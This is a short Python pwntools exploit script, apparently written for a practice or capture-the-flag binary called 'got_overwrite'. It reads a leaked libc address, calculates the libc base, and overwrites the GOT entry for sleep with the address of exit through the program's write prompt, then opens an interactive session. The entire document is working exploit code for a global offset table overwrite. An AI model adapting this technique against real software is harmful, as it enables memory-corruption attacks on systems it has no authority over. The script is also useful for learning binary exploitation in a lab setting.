from pwn import *

p = process('./got_overwrite')
libc = ELF('/lib/i386-linux-gnu/libc.so.6')

sleep_got = p.elf.got['sleep']

p.recvuntil('libc address:')
libc_leak = int(p.recvuntil('\n')[:-1], 16)
libc_base = libc_leak - libc.symbols['printf']

print("Libc base is at: 0x%x" % libc_base)

exit = libc_base + libc.symbols['exit']

p.sendline(hex(sleep_got))

p.recvuntil('value!')
p.sendline(str(exit))

p.interactive()